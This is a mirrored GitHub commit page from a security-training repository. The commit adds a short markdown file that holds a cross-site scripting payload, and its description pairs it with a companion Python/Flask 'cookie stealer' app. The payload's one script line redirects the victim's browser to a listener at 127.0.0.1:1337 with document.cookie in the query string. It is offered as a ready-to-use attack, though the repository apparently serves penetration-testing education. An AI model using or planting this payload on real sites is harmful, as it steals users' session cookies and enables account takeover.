mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-10 05:34:12 +00:00
Create cookie_stealer_payload.md
This commit is contained in:
parent
923c66f672
commit
a0356f0d80
1 changed files with 6 additions and 0 deletions
6
web_application_testing/cookie_stealer_payload.md
Normal file
6
web_application_testing/cookie_stealer_payload.md
Normal file
|
@ -0,0 +1,6 @@
|
|||
# Cookie Stealer Payload
|
||||
This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py).
|
||||
|
||||
```
|
||||
<script type=“text/javascript”>document.location=“http://127.0.0.1:1337/?c=“+document.cookie;</script>
|
||||
```
|
Loading…
Reference in a new issue